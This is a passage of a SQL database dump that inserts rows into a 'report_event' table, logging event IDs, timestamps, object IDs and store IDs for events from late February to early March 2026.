(26977, '2026-02-27 21:04:57', 1, 2060, 0, 1, 1),
(26978, '2026-02-27 21:51:33', 1, 2054, 0, 1, 1),
(26979, '2026-02-27 22:19:41', 1, 2053, 0, 1, 1),
(26980, '2026-02-27 22:22:28', 1, 2064, 0, 1, 1),
(26981, '2026-02-27 22:38:39', 1, 2061, 0, 1, 1),
(26982, '2026-02-27 22:43:01', 1, 2062, 0, 1, 1),
(26983, '2026-02-27 22:43:05', 1, 2061, 0, 1, 1),
(26984, '2026-02-27 22:43:11', 1, 2063, 0, 1, 1),
(26985, '2026-02-27 22:55:59', 1, 2061, 0, 1, 1),
(26986, '2026-02-28 00:06:28', 1, 2064, 0, 1, 1),
(26987, '2026-02-28 00:12:46', 1, 2053, 0, 1, 1),
(26988, '2026-02-28 00:17:10', 1, 2063, 0, 1, 1),
(26989, '2026-02-28 00:17:40', 1, 2063, 0, 1, 1),
(26990, '2026-02-28 00:31:51', 1, 2060, 0, 1, 1),
(26991, '2026-02-28 00:32:14', 1, 2059, 0, 1, 1),
(26992, '2026-02-28 00:33:22', 1, 2061, 0, 1, 1),
(26993, '2026-02-28 00:47:08', 1, 2058, 0, 1, 1),
(26994, '2026-02-28 01:55:36', 1, 2060, 0, 1, 1),
(26995, '2026-02-28 02:22:12', 1, 2053, 0, 1, 1),
(26996, '2026-02-28 04:36:37', 1, 2061, 0, 1, 1),
(26997, '2026-02-28 04:36:38', 1, 2061, 0, 1, 1),
(26998, '2026-02-28 04:36:43', 1, 2061, 0, 1, 1),
(26999, '2026-02-28 04:37:05', 1, 2061, 0, 1, 1),
(27000, '2026-02-28 04:37:47', 1, 2061, 0, 1, 1),
(27001, '2026-02-28 04:39:27', 1, 2061, 0, 1, 1),
(27002, '2026-02-28 04:41:46', 1, 2061, 0, 1, 1),
(27003, '2026-02-28 05:07:34', 1, 2059, 0, 1, 1),
(27004, '2026-02-28 06:43:17', 1, 2059, 0, 1, 1),
(27005, '2026-02-28 06:43:20', 1, 2060, 0, 1, 1),
(27006, '2026-02-28 07:08:21', 1, 2064, 0, 1, 1),
(27007, '2026-02-28 07:18:26', 1, 2063, 0, 1, 1),
(27008, '2026-02-28 07:39:18', 1, 2060, 0, 1, 1),
(27009, '2026-02-28 08:29:20', 1, 2064, 0, 1, 1),
(27010, '2026-02-28 10:10:43', 1, 2061, 0, 1, 1),
(27011, '2026-02-28 10:46:07', 1, 2063, 0, 1, 1),
(27012, '2026-02-28 11:23:52', 1, 2059, 0, 1, 1),
(27013, '2026-02-28 11:25:15', 1, 2063, 0, 1, 1),
(27014, '2026-02-28 11:38:49', 1, 2054, 0, 1, 1),
(27015, '2026-02-28 11:58:22', 1, 2060, 0, 1, 1),
(27016, '2026-02-28 12:43:34', 1, 2053, 0, 1, 1),
(27017, '2026-02-28 13:29:51', 1, 2059, 0, 1, 1),
(27018, '2026-02-28 13:30:33', 1, 2053, 0, 1, 1),
(27019, '2026-02-28 13:30:33', 1, 2053, 0, 1, 1),
(27020, '2026-02-28 13:30:43', 1, 2063, 0, 1, 1),
(27021, '2026-02-28 13:30:45', 1, 2063, 0, 1, 1),
(27022, '2026-02-28 13:30:46', 1, 2062, 0, 1, 1),
(27023, '2026-02-28 13:30:47', 1, 2062, 0, 1, 1),
(27024, '2026-02-28 13:30:49', 1, 2060, 0, 1, 1),
(27025, '2026-02-28 13:30:50', 1, 2060, 0, 1, 1),
(27026, '2026-02-28 13:30:52', 1, 2059, 0, 1, 1),
(27027, '2026-02-28 13:30:53', 1, 2059, 0, 1, 1),
(27028, '2026-02-28 13:30:55', 1, 2061, 0, 1, 1),
(27029, '2026-02-28 13:30:56', 1, 2061, 0, 1, 1),
(27030, '2026-02-28 13:30:57', 1, 2058, 0, 1, 1),
(27031, '2026-02-28 13:30:59', 1, 2058, 0, 1, 1),
(27032, '2026-02-28 13:32:23', 1, 2053, 0, 1, 1),
(27033, '2026-02-28 13:32:25', 1, 2053, 0, 1, 1),
(27034, '2026-02-28 13:32:32', 1, 2063, 0, 1, 1),
(27035, '2026-02-28 13:32:34', 1, 2063, 0, 1, 1),
(27036, '2026-02-28 13:32:34', 1, 2062, 0, 1, 1),
(27037, '2026-02-28 13:32:36', 1, 2062, 0, 1, 1),
(27038, '2026-02-28 13:32:37', 1, 2060, 0, 1, 1),
(27039, '2026-02-28 13:32:39', 1, 2060, 0, 1, 1),
(27040, '2026-02-28 13:32:40', 1, 2059, 0, 1, 1),
(27041, '2026-02-28 13:32:42', 1, 2059, 0, 1, 1),
(27042, '2026-02-28 13:32:43', 1, 2061, 0, 1, 1),
(27043, '2026-02-28 13:32:44', 1, 2061, 0, 1, 1),
(27044, '2026-02-28 13:32:45', 1, 2058, 0, 1, 1),
(27045, '2026-02-28 13:32:47', 1, 2058, 0, 1, 1),
(27046, '2026-02-28 13:34:42', 1, 2061, 0, 1, 1),
(27047, '2026-02-28 13:47:55', 1, 2061, 0, 1, 1),
(27048, '2026-02-28 14:16:59', 1, 2054, 0, 1, 1),
(27049, '2026-02-28 14:17:05', 1, 2060, 0, 1, 1),
(27050, '2026-02-28 14:19:03', 1, 2058, 0, 1, 1),
(27051, '2026-02-28 14:19:07', 1, 2060, 0, 1, 1),
(27052, '2026-02-28 14:20:32', 1, 2055, 0, 1, 1),
(27053, '2026-02-28 14:50:01', 1, 2060, 0, 1, 1),
(27054, '2026-02-28 15:43:53', 1, 2058, 0, 1, 1),
(27055, '2026-02-28 15:44:02', 1, 2064, 0, 1, 1),
(27056, '2026-02-28 15:44:11', 1, 2062, 0, 1, 1),
(27057, '2026-02-28 15:44:12', 1, 2055, 0, 1, 1),
(27058, '2026-02-28 15:44:21', 1, 2059, 0, 1, 1),
(27059, '2026-02-28 15:44:23', 1, 2063, 0, 1, 1),
(27060, '2026-02-28 15:44:24', 1, 2061, 0, 1, 1),
(27061, '2026-02-28 15:44:28', 1, 2054, 0, 1, 1),
(27062, '2026-02-28 15:44:35', 1, 2060, 0, 1, 1),
(27063, '2026-02-28 15:44:56', 1, 2058, 0, 1, 1),
(27064, '2026-02-28 15:45:04', 1, 2064, 0, 1, 1),
(27065, '2026-02-28 15:45:16', 1, 2062, 0, 1, 1),
(27066, '2026-02-28 15:45:17', 1, 2054, 0, 1, 1),
(27067, '2026-02-28 15:45:19', 1, 2055, 0, 1, 1),
(27068, '2026-02-28 15:45:29', 1, 2059, 0, 1, 1),
(27069, '2026-02-28 15:45:31', 1, 2063, 0, 1, 1),
(27070, '2026-02-28 15:45:32', 1, 2061, 0, 1, 1),
(27071, '2026-02-28 15:45:36', 1, 2060, 0, 1, 1),
(27072, '2026-02-28 15:46:01', 1, 2053, 0, 1, 1),
(27073, '2026-02-28 16:25:28', 1, 2062, 0, 1, 1),
(27074, '2026-02-28 16:25:52', 1, 2062, 0, 1, 1),
(27075, '2026-02-28 16:44:24', 1, 2053, 0, 1, 1),
(27076, '2026-02-28 16:45:45', 1, 2062, 0, 1, 1),
(27077, '2026-02-28 17:20:00', 1, 2064, 0, 1, 1),
(27078, '2026-02-28 17:20:00', 1, 2064, 0, 1, 1),
(27079, '2026-02-28 17:20:00', 1, 2064, 0, 1, 1),
(27080, '2026-02-28 17:20:01', 1, 2062, 0, 1, 1),
(27081, '2026-02-28 17:20:01', 1, 2063, 0, 1, 1),
(27082, '2026-02-28 17:20:01', 1, 2061, 0, 1, 1),
(27083, '2026-02-28 17:20:03', 1, 2060, 0, 1, 1),
(27084, '2026-02-28 17:20:03', 1, 2059, 0, 1, 1),
(27085, '2026-02-28 17:20:04', 1, 2058, 0, 1, 1),
(27086, '2026-02-28 17:20:04', 1, 2055, 0, 1, 1),
(27087, '2026-02-28 17:20:05', 1, 2054, 0, 1, 1),
(27088, '2026-02-28 17:20:06', 1, 2060, 0, 1, 1),
(27089, '2026-02-28 17:20:06', 1, 2055, 0, 1, 1),
(27090, '2026-02-28 17:20:06', 1, 2059, 0, 1, 1),
(27091, '2026-02-28 17:20:07', 1, 2058, 0, 1, 1),
(27092, '2026-02-28 17:20:07', 1, 2060, 0, 1, 1),
(27093, '2026-02-28 17:20:08', 1, 2059, 0, 1, 1),
(27094, '2026-02-28 17:20:08', 1, 2054, 0, 1, 1),
(27095, '2026-02-28 17:20:08', 1, 2058, 0, 1, 1),
(27096, '2026-02-28 17:20:09', 1, 2055, 0, 1, 1),
(27097, '2026-02-28 17:20:09', 1, 2054, 0, 1, 1),
(27098, '2026-02-28 17:20:10', 1, 2060, 0, 1, 1),
(27099, '2026-02-28 17:20:10', 1, 2059, 0, 1, 1),
(27100, '2026-02-28 17:20:11', 1, 2058, 0, 1, 1),
(27101, '2026-02-28 17:20:11', 1, 2060, 0, 1, 1),
(27102, '2026-02-28 17:20:12', 1, 2059, 0, 1, 1),
(27103, '2026-02-28 17:20:12', 1, 2058, 0, 1, 1),
(27104, '2026-02-28 17:22:27', 1, 2061, 0, 1, 1),
(27105, '2026-02-28 17:22:27', 1, 2062, 0, 1, 1),
(27106, '2026-02-28 17:22:27', 1, 2064, 0, 1, 1),
(27107, '2026-02-28 17:22:27', 1, 2064, 0, 1, 1),
(27108, '2026-02-28 17:22:27', 1, 2064, 0, 1, 1),
(27109, '2026-02-28 17:22:28', 1, 2063, 0, 1, 1),
(27110, '2026-02-28 17:22:28', 1, 2060, 0, 1, 1),
(27111, '2026-02-28 17:22:28', 1, 2059, 0, 1, 1),
(27112, '2026-02-28 17:22:29', 1, 2058, 0, 1, 1),
(27113, '2026-02-28 17:22:30', 1, 2055, 0, 1, 1),
(27114, '2026-02-28 17:22:31', 1, 2054, 0, 1, 1),
(27115, '2026-02-28 17:22:32', 1, 2058, 0, 1, 1),
(27116, '2026-02-28 17:22:33', 1, 2055, 0, 1, 1),
(27117, '2026-02-28 17:22:33', 1, 2054, 0, 1, 1),
(27118, '2026-02-28 17:22:35', 1, 2055, 0, 1, 1),
(27119, '2026-02-28 17:22:35', 1, 2058, 0, 1, 1),
(27120, '2026-02-28 17:22:36', 1, 2054, 0, 1, 1),
(27121, '2026-02-28 17:22:37', 1, 2058, 0, 1, 1),
(27122, '2026-02-28 17:22:38', 1, 2055, 0, 1, 1),
(27123, '2026-02-28 17:22:39', 1, 2054, 0, 1, 1),
(27124, '2026-02-28 17:22:40', 1, 2058, 0, 1, 1),
(27125, '2026-02-28 17:22:40', 1, 2055, 0, 1, 1),
(27126, '2026-02-28 17:22:41', 1, 2054, 0, 1, 1),
(27127, '2026-02-28 17:22:42', 1, 2058, 0, 1, 1),
(27128, '2026-02-28 17:22:43', 1, 2055, 0, 1, 1),
(27129, '2026-02-28 17:22:44', 1, 2054, 0, 1, 1),
(27130, '2026-02-28 17:27:52', 1, 2061, 0, 1, 1),
(27131, '2026-02-28 17:36:05', 1, 2058, 0, 1, 1),
(27132, '2026-02-28 17:44:56', 1, 2063, 0, 1, 1),
(27133, '2026-02-28 17:45:57', 1, 2055, 0, 1, 1),
(27134, '2026-02-28 17:56:59', 1, 2054, 0, 1, 1),
(27135, '2026-02-28 17:59:53', 1, 2053, 0, 1, 1),
(27136, '2026-02-28 18:01:00', 1, 2055, 0, 1, 1),
(27137, '2026-02-28 18:01:13', 1, 2058, 0, 1, 1),
(27138, '2026-02-28 18:25:15', 1, 2055, 0, 1, 1),
(27139, '2026-02-28 18:43:30', 1, 2061, 0, 1, 1),
(27140, '2026-02-28 18:49:03', 1, 2059, 0, 1, 1),
(27141, '2026-02-28 19:44:52', 1, 2062, 0, 1, 1),
(27142, '2026-03-01 00:15:24', 1, 2064, 0, 1, 1),
(27143, '2026-03-01 00:32:47', 1, 2060, 0, 1, 1),
(27144, '2026-03-01 00:34:11', 1, 2059, 0, 1, 1),
(27145, '2026-03-01 01:08:54', 1, 2061, 0, 1, 1),
(27146, '2026-03-01 01:09:51', 1, 2061, 0, 1, 1),
(27147, '2026-03-01 01:10:51', 1, 2061, 0, 1, 1),
(27148, '2026-03-01 01:11:55', 1, 2061, 0, 1, 1),
(27149, '2026-03-01 01:15:56', 1, 2061, 0, 1, 1),
(27150, '2026-03-01 01:22:32', 1, 2059, 0, 1, 1),
(27151, '2026-03-01 03:35:37', 1, 2053, 0, 1, 1),
(27152, '2026-03-01 03:50:31', 1, 2061, 0, 1, 1),
(27153, '2026-03-01 04:03:25', 1, 2060, 0, 1, 1),
(27154, '2026-03-01 04:19:14', 1, 2054, 0, 1, 1),
(27155, '2026-03-01 06:15:03', 1, 2060, 0, 1, 1),
(27156, '2026-03-01 08:13:32', 1, 2053, 0, 1, 1),
(27157, '2026-03-01 08:26:06', 1, 2053, 0, 1, 1),
(27158, '2026-03-01 09:09:30', 1, 2061, 0, 1, 1),
(27159, '2026-03-01 09:28:44', 1, 2062, 0, 1, 1),
(27160, '2026-03-01 09:36:49', 1, 2061, 0, 1, 1),
(27161, '2026-03-01 10:16:52', 1, 2060, 0, 1, 1),
(27162, '2026-03-01 11:26:55', 1, 2064, 0, 1, 1),
(27163, '2026-03-01 12:17:53', 1, 2064, 0, 1, 1),
(27164, '2026-03-01 13:53:29', 1, 2059, 0, 1, 1),
(27165, '2026-03-01 13:58:22', 1, 2061, 0, 1, 1),
(27166, '2026-03-01 16:40:02', 1, 2063, 0, 1, 1),
(27167, '2026-03-01 17:11:46', 1, 2062, 0, 1, 1),
(27168, '2026-03-01 17:12:14', 1, 2062, 0, 1, 1),
(27169, '2026-03-01 17:40:45', 1, 2063, 0, 1, 1),
(27170, '2026-03-01 19:25:25', 1, 2062, 0, 1, 1),
(27171, '2026-03-01 22:39:55', 1, 2063, 0, 1, 1),
(27172, '2026-03-01 23:26:35', 1, 2053, 0, 1, 1),
(27173, '2026-03-01 23:35:10', 1, 2060, 0, 1, 1),
(27174, '2026-03-02 00:20:14', 1, 2060, 0, 1, 1),
(27175, '2026-03-02 00:32:27', 1, 2060, 0, 1, 1),
(27176, '2026-03-02 01:54:30', 1, 2064, 7157, 1, 1),
(27177, '2026-03-02 02:57:08', 1, 2059, 0, 1, 1),
(27178, '2026-03-02 03:37:16', 1, 2053, 0, 1, 1),
(27179, '2026-03-02 03:51:42', 1, 2061, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(27180, '2026-03-02 03:52:35', 1, 2061, 0, 1, 1),
(27181, '2026-03-02 04:17:25', 1, 2062, 0, 1, 1),
(27182, '2026-03-02 06:44:22', 1, 2061, 0, 1, 1),
(27183, '2026-03-02 10:16:58', 1, 2059, 0, 1, 1),
(27184, '2026-03-02 11:30:55', 1, 2061, 0, 1, 1),
(27185, '2026-03-02 12:52:39', 1, 2058, 0, 1, 1),
(27186, '2026-03-02 12:52:47', 1, 2058, 0, 1, 1),
(27187, '2026-03-02 12:56:11', 1, 2060, 0, 1, 1),
(27188, '2026-03-02 12:56:14', 1, 2060, 0, 1, 1),
(27189, '2026-03-02 13:20:22', 1, 2060, 0, 1, 1),
(27190, '2026-03-02 13:20:25', 1, 2060, 0, 1, 1),
(27191, '2026-03-02 13:30:59', 1, 2060, 0, 1, 1),
(27192, '2026-03-02 14:16:25', 1, 2058, 0, 1, 1),
(27193, '2026-03-02 14:17:44', 1, 2060, 0, 1, 1),
(27194, '2026-03-02 14:17:52', 1, 2055, 0, 1, 1),
(27195, '2026-03-02 14:17:53', 1, 2054, 0, 1, 1),
(27196, '2026-03-02 14:18:48', 1, 2060, 0, 1, 1),
(27197, '2026-03-02 14:29:32', 1, 2059, 0, 1, 1),
(27198, '2026-03-02 14:34:32', 1, 2061, 0, 1, 1),
(27199, '2026-03-02 14:39:06', 1, 2061, 0, 1, 1),
(27200, '2026-03-02 16:30:02', 1, 2062, 0, 1, 1),
(27201, '2026-03-02 16:30:35', 1, 2062, 0, 1, 1),
(27202, '2026-03-02 16:48:13', 1, 2053, 0, 1, 1),
(27203, '2026-03-02 17:13:09', 1, 2053, 0, 1, 1),
(27204, '2026-03-02 19:52:27', 1, 2054, 0, 1, 1),
(27205, '2026-03-02 19:52:30', 1, 2058, 0, 1, 1),
(27206, '2026-03-02 19:56:26', 1, 2062, 0, 1, 1),
(27207, '2026-03-02 20:38:09', 1, 2064, 0, 1, 1),
(27208, '2026-03-02 21:07:28', 1, 2060, 0, 1, 1),
(27209, '2026-03-02 21:47:32', 1, 2058, 0, 1, 1),
(27210, '2026-03-02 23:43:08', 1, 2063, 0, 1, 1),
(27211, '2026-03-03 04:59:17', 1, 2061, 0, 1, 1),
(27212, '2026-03-03 05:42:16', 1, 2060, 0, 1, 1),
(27213, '2026-03-03 06:56:00', 1, 2062, 0, 1, 1),
(27214, '2026-03-03 06:56:03', 1, 2062, 0, 1, 1),
(27215, '2026-03-03 07:11:33', 1, 2053, 0, 1, 1),
(27216, '2026-03-03 07:15:28', 1, 2059, 0, 1, 1),
(27217, '2026-03-03 09:22:44', 1, 2061, 0, 1, 1),
(27218, '2026-03-03 09:40:00', 1, 2060, 0, 1, 1),
(27219, '2026-03-03 10:08:01', 1, 2053, 0, 1, 1),
(27220, '2026-03-03 10:51:04', 1, 2060, 0, 1, 1),
(27221, '2026-03-03 10:53:19', 1, 2054, 0, 1, 1),
(27222, '2026-03-03 10:53:34', 1, 2063, 0, 1, 1),
(27223, '2026-03-03 10:57:03', 1, 2061, 0, 1, 1),
(27224, '2026-03-03 11:02:48', 1, 2055, 0, 1, 1),
(27225, '2026-03-03 11:05:39', 1, 2062, 0, 1, 1),
(27226, '2026-03-03 11:06:03', 1, 2059, 0, 1, 1),
(27227, '2026-03-03 11:42:42', 1, 2060, 0, 1, 1),
(27228, '2026-03-03 11:49:47', 1, 2064, 0, 1, 1),
(27229, '2026-03-03 12:20:54', 1, 2058, 0, 1, 1),
(27230, '2026-03-03 13:20:19', 1, 2053, 0, 1, 1),
(27231, '2026-03-03 13:46:08', 1, 2060, 0, 1, 1),
(27232, '2026-03-03 13:46:15', 1, 2062, 0, 1, 1),
(27233, '2026-03-03 13:54:15', 1, 2064, 0, 1, 1),
(27234, '2026-03-03 13:55:25', 1, 2059, 0, 1, 1),
(27235, '2026-03-03 13:55:43', 1, 2062, 0, 1, 1),
(27236, '2026-03-03 13:55:44', 1, 2063, 0, 1, 1),
(27237, '2026-03-03 13:56:33', 1, 2058, 0, 1, 1),
(27238, '2026-03-03 13:56:33', 1, 2055, 0, 1, 1),
(27239, '2026-03-03 13:56:38', 1, 2061, 0, 1, 1),
(27240, '2026-03-03 13:57:05', 1, 2054, 0, 1, 1),
(27241, '2026-03-03 13:57:50', 1, 2060, 0, 1, 1),
(27242, '2026-03-03 14:17:07', 1, 2054, 0, 1, 1),
(27243, '2026-03-03 14:17:11', 1, 2060, 0, 1, 1),
(27244, '2026-03-03 14:17:12', 1, 2060, 0, 1, 1),
(27245, '2026-03-03 14:17:26', 1, 2058, 0, 1, 1),
(27246, '2026-03-03 14:19:56', 1, 2055, 0, 1, 1),
(27247, '2026-03-03 15:04:18', 1, 2061, 0, 1, 1),
(27248, '2026-03-03 15:08:45', 1, 2055, 0, 1, 1),
(27249, '2026-03-03 15:08:46', 1, 2059, 0, 1, 1),
(27250, '2026-03-03 15:11:20', 1, 2060, 0, 1, 1),
(27251, '2026-03-03 16:11:54', 1, 2053, 0, 1, 1),
(27252, '2026-03-03 16:31:19', 1, 2062, 0, 1, 1),
(27253, '2026-03-03 16:31:44', 1, 2062, 0, 1, 1),
(27254, '2026-03-03 17:08:47', 1, 2062, 0, 1, 1),
(27255, '2026-03-03 20:51:13', 1, 2062, 0, 1, 1),
(27256, '2026-03-03 21:53:18', 1, 2063, 0, 1, 1),
(27257, '2026-03-03 22:11:44', 1, 2055, 0, 1, 1),
(27258, '2026-03-03 23:44:02', 1, 2053, 0, 1, 1),
(27259, '2026-03-04 00:42:53', 1, 2061, 0, 1, 1),
(27260, '2026-03-04 06:05:52', 1, 2060, 0, 1, 1),
(27261, '2026-03-04 09:05:49', 1, 2064, 0, 1, 1),
(27262, '2026-03-04 11:02:04', 1, 2054, 0, 1, 1),
(27263, '2026-03-04 12:27:16', 1, 2061, 0, 1, 1),
(27264, '2026-03-04 12:31:20', 1, 2053, 0, 1, 1),
(27265, '2026-03-04 14:17:08', 1, 2060, 0, 1, 1),
(27266, '2026-03-04 14:17:29', 1, 2060, 0, 1, 1),
(27267, '2026-03-04 14:18:26', 1, 2054, 0, 1, 1),
(27268, '2026-03-04 14:18:28', 1, 2055, 0, 1, 1),
(27269, '2026-03-04 14:19:37', 1, 2058, 0, 1, 1),
(27270, '2026-03-04 14:52:50', 1, 2055, 0, 1, 1),
(27271, '2026-03-04 15:10:47', 1, 2060, 0, 1, 1),
(27272, '2026-03-04 15:10:50', 1, 2060, 0, 1, 1),
(27273, '2026-03-04 15:11:43', 1, 2061, 0, 1, 1),
(27274, '2026-03-04 15:41:52', 1, 2060, 0, 1, 1),
(27275, '2026-03-04 15:41:54', 1, 2060, 0, 1, 1),
(27276, '2026-03-04 16:23:35', 1, 2060, 0, 1, 1),
(27277, '2026-03-04 16:52:52', 1, 2062, 0, 1, 1),
(27278, '2026-03-04 16:53:17', 1, 2062, 0, 1, 1),
(27279, '2026-03-04 17:40:51', 1, 2059, 0, 1, 1),
(27280, '2026-03-04 17:41:18', 1, 2060, 0, 1, 1),
(27281, '2026-03-04 19:16:41', 1, 2060, 0, 1, 1),
(27282, '2026-03-04 19:56:26', 1, 2060, 0, 1, 1),
(27283, '2026-03-04 20:44:12', 1, 2055, 0, 1, 1),
(27284, '2026-03-04 21:11:45', 1, 2058, 0, 1, 1),
(27285, '2026-03-04 23:33:29', 1, 2061, 0, 1, 1),
(27286, '2026-03-05 01:43:54', 1, 2060, 0, 1, 1),
(27287, '2026-03-05 02:37:44', 1, 2061, 0, 1, 1),
(27288, '2026-03-05 03:33:08', 1, 2061, 0, 1, 1),
(27289, '2026-03-05 03:34:43', 1, 2053, 0, 1, 1),
(27290, '2026-03-05 03:57:07', 1, 2058, 0, 1, 1),
(27291, '2026-03-05 04:37:31', 1, 2064, 0, 1, 1),
(27292, '2026-03-05 05:01:14', 1, 2055, 0, 1, 1),
(27293, '2026-03-05 05:16:58', 1, 2060, 0, 1, 1),
(27294, '2026-03-05 06:00:34', 1, 2053, 0, 1, 1),
(27295, '2026-03-05 10:56:29', 1, 2064, 0, 1, 1),
(27296, '2026-03-05 10:56:35', 1, 2059, 0, 1, 1),
(27297, '2026-03-05 10:56:54', 1, 2063, 0, 1, 1),
(27298, '2026-03-05 10:57:00', 1, 2060, 0, 1, 1),
(27299, '2026-03-05 14:16:23', 1, 2060, 0, 1, 1),
(27300, '2026-03-05 14:17:40', 1, 2054, 0, 1, 1),
(27301, '2026-03-05 14:18:48', 1, 2060, 0, 1, 1),
(27302, '2026-03-05 14:20:25', 1, 2055, 0, 1, 1),
(27303, '2026-03-05 14:21:21', 1, 2058, 0, 1, 1),
(27304, '2026-03-05 15:32:38', 1, 2053, 0, 1, 1),
(27305, '2026-03-05 16:03:39', 1, 2061, 0, 1, 1),
(27306, '2026-03-05 16:24:03', 1, 2053, 0, 1, 1),
(27307, '2026-03-05 16:51:18', 1, 2062, 0, 1, 1),
(27308, '2026-03-05 16:51:37', 1, 2062, 0, 1, 1),
(27309, '2026-03-05 16:53:45', 1, 2053, 0, 1, 1),
(27310, '2026-03-05 19:46:40', 1, 2060, 0, 1, 1),
(27311, '2026-03-05 20:21:41', 1, 2058, 0, 1, 1),
(27312, '2026-03-05 20:27:21', 1, 2060, 0, 1, 1),
(27313, '2026-03-05 20:33:37', 1, 2062, 0, 1, 1),
(27314, '2026-03-05 20:39:17', 1, 2063, 0, 1, 1),
(27315, '2026-03-05 22:22:46', 1, 2060, 0, 1, 1),
(27316, '2026-03-05 22:36:31', 1, 2060, 0, 1, 1),
(27317, '2026-03-06 02:06:27', 1, 2053, 0, 1, 1),
(27318, '2026-03-06 02:12:41', 1, 2061, 0, 1, 1),
(27319, '2026-03-06 03:42:33', 1, 2059, 0, 1, 1),
(27320, '2026-03-06 05:46:16', 1, 2061, 0, 1, 1),
(27321, '2026-03-06 05:46:58', 1, 2063, 0, 1, 1),
(27322, '2026-03-06 06:16:13', 1, 2061, 0, 1, 1),
(27323, '2026-03-06 07:31:53', 1, 2060, 0, 1, 1),
(27324, '2026-03-06 07:57:49', 1, 2064, 0, 1, 1),
(27325, '2026-03-06 08:33:35', 1, 2053, 0, 1, 1),
(27326, '2026-03-06 11:41:18', 1, 2055, 0, 1, 1),
(27327, '2026-03-06 12:40:54', 1, 2060, 0, 1, 1),
(27328, '2026-03-06 12:46:45', 1, 2060, 0, 1, 1),
(27329, '2026-03-06 13:10:50', 1, 2063, 0, 1, 1),
(27330, '2026-03-06 13:42:01', 1, 2054, 0, 1, 1),
(27331, '2026-03-06 14:18:26', 1, 2058, 0, 1, 1),
(27332, '2026-03-06 14:18:27', 1, 2054, 0, 1, 1),
(27333, '2026-03-06 14:20:00', 1, 2055, 0, 1, 1),
(27334, '2026-03-06 14:20:26', 1, 2060, 0, 1, 1),
(27335, '2026-03-06 14:22:00', 1, 2060, 0, 1, 1),
(27336, '2026-03-06 14:31:58', 1, 2063, 0, 1, 1),
(27337, '2026-03-06 15:46:55', 1, 2061, 0, 1, 1),
(27338, '2026-03-06 16:09:55', 1, 2061, 0, 1, 1),
(27339, '2026-03-06 16:22:09', 1, 2062, 0, 1, 1),
(27340, '2026-03-06 16:22:52', 1, 2062, 0, 1, 1),
(27341, '2026-03-06 16:32:43', 1, 2061, 0, 1, 1),
(27342, '2026-03-06 16:47:56', 1, 2062, 0, 1, 1),
(27343, '2026-03-06 16:48:39', 1, 2062, 0, 1, 1),
(27344, '2026-03-06 17:03:13', 1, 2054, 0, 1, 1),
(27345, '2026-03-06 17:21:36', 1, 2061, 0, 1, 1),
(27346, '2026-03-06 17:22:46', 1, 2061, 0, 1, 1),
(27347, '2026-03-06 17:43:24', 1, 2061, 0, 1, 1),
(27348, '2026-03-06 18:27:33', 1, 2053, 0, 1, 1),
(27349, '2026-03-06 22:08:18', 1, 2054, 0, 1, 1),
(27350, '2026-03-06 22:39:46', 1, 2063, 0, 1, 1),
(27351, '2026-03-06 22:39:50', 1, 2061, 0, 1, 1),
(27352, '2026-03-06 22:39:58', 1, 2062, 0, 1, 1),
(27353, '2026-03-07 01:20:55', 1, 2061, 0, 1, 1),
(27354, '2026-03-07 01:43:18', 1, 2053, 0, 1, 1),
(27355, '2026-03-07 02:16:04', 1, 2064, 0, 1, 1),
(27356, '2026-03-07 02:26:22', 1, 2063, 0, 1, 1),
(27357, '2026-03-07 03:25:25', 1, 2063, 0, 1, 1),
(27358, '2026-03-07 06:01:11', 1, 2061, 0, 1, 1),
(27359, '2026-03-07 06:10:20', 1, 2053, 0, 1, 1),
(27360, '2026-03-07 06:50:25', 1, 2059, 0, 1, 1),
(27361, '2026-03-07 06:50:29', 1, 2060, 0, 1, 1),
(27362, '2026-03-07 08:41:33', 1, 2058, 0, 1, 1),
(27363, '2026-03-07 08:41:37', 1, 2053, 0, 1, 1),
(27364, '2026-03-07 08:53:16', 1, 2060, 0, 1, 1),
(27365, '2026-03-07 09:28:18', 1, 2058, 0, 1, 1),
(27366, '2026-03-07 11:05:45', 1, 2053, 0, 1, 1),
(27367, '2026-03-07 11:30:27', 1, 2060, 0, 1, 1),
(27368, '2026-03-07 14:03:40', 1, 2060, 0, 1, 1),
(27369, '2026-03-07 14:03:44', 1, 2060, 0, 1, 1),
(27370, '2026-03-07 14:15:09', 1, 2061, 0, 1, 1),
(27371, '2026-03-07 14:18:21', 1, 2062, 0, 1, 1),
(27372, '2026-03-07 14:22:16', 1, 2058, 0, 1, 1),
(27373, '2026-03-07 14:22:19', 1, 2055, 0, 1, 1),
(27374, '2026-03-07 14:25:37', 1, 2054, 0, 1, 1),
(27375, '2026-03-07 14:25:50', 1, 2060, 0, 1, 1),
(27376, '2026-03-07 14:25:51', 1, 2060, 0, 1, 1),
(27377, '2026-03-07 14:58:17', 1, 2060, 0, 1, 1),
(27378, '2026-03-07 14:58:20', 1, 2060, 0, 1, 1),
(27379, '2026-03-07 16:22:33', 1, 2062, 0, 1, 1),
(27380, '2026-03-07 16:23:16', 1, 2062, 0, 1, 1),
(27381, '2026-03-07 17:30:14', 1, 2053, 0, 1, 1),
(27382, '2026-03-07 18:09:57', 1, 2061, 0, 1, 1),
(27383, '2026-03-07 18:17:44', 1, 2058, 0, 1, 1),
(27384, '2026-03-07 18:27:07', 1, 2055, 0, 1, 1),
(27385, '2026-03-07 18:39:01', 1, 2054, 0, 1, 1),
(27386, '2026-03-07 19:38:57', 1, 2054, 0, 1, 1),
(27387, '2026-03-07 20:45:42', 1, 2060, 0, 1, 1),
(27388, '2026-03-07 22:08:12', 1, 2064, 0, 1, 1),
(27389, '2026-03-07 22:47:55', 1, 2061, 0, 1, 1),
(27390, '2026-03-07 23:09:40', 1, 2061, 0, 1, 1),
(27391, '2026-03-07 23:33:19', 1, 2060, 0, 1, 1),
(27392, '2026-03-07 23:48:43', 1, 2053, 0, 1, 1),
(27393, '2026-03-08 00:25:14', 1, 2064, 0, 1, 1),
(27394, '2026-03-08 00:51:11', 1, 2058, 0, 1, 1),
(27395, '2026-03-08 00:57:04', 1, 2061, 0, 1, 1),
(27396, '2026-03-08 00:59:11', 1, 2064, 0, 1, 1),
(27397, '2026-03-08 01:03:49', 1, 2054, 0, 1, 1),
(27398, '2026-03-08 01:27:54', 1, 2059, 0, 1, 1),
(27399, '2026-03-08 01:48:00', 1, 2062, 0, 1, 1),
(27400, '2026-03-08 02:04:06', 1, 2059, 0, 1, 1),
(27401, '2026-03-08 02:08:59', 1, 2055, 0, 1, 1),
(27402, '2026-03-08 02:18:01', 1, 2059, 0, 1, 1),
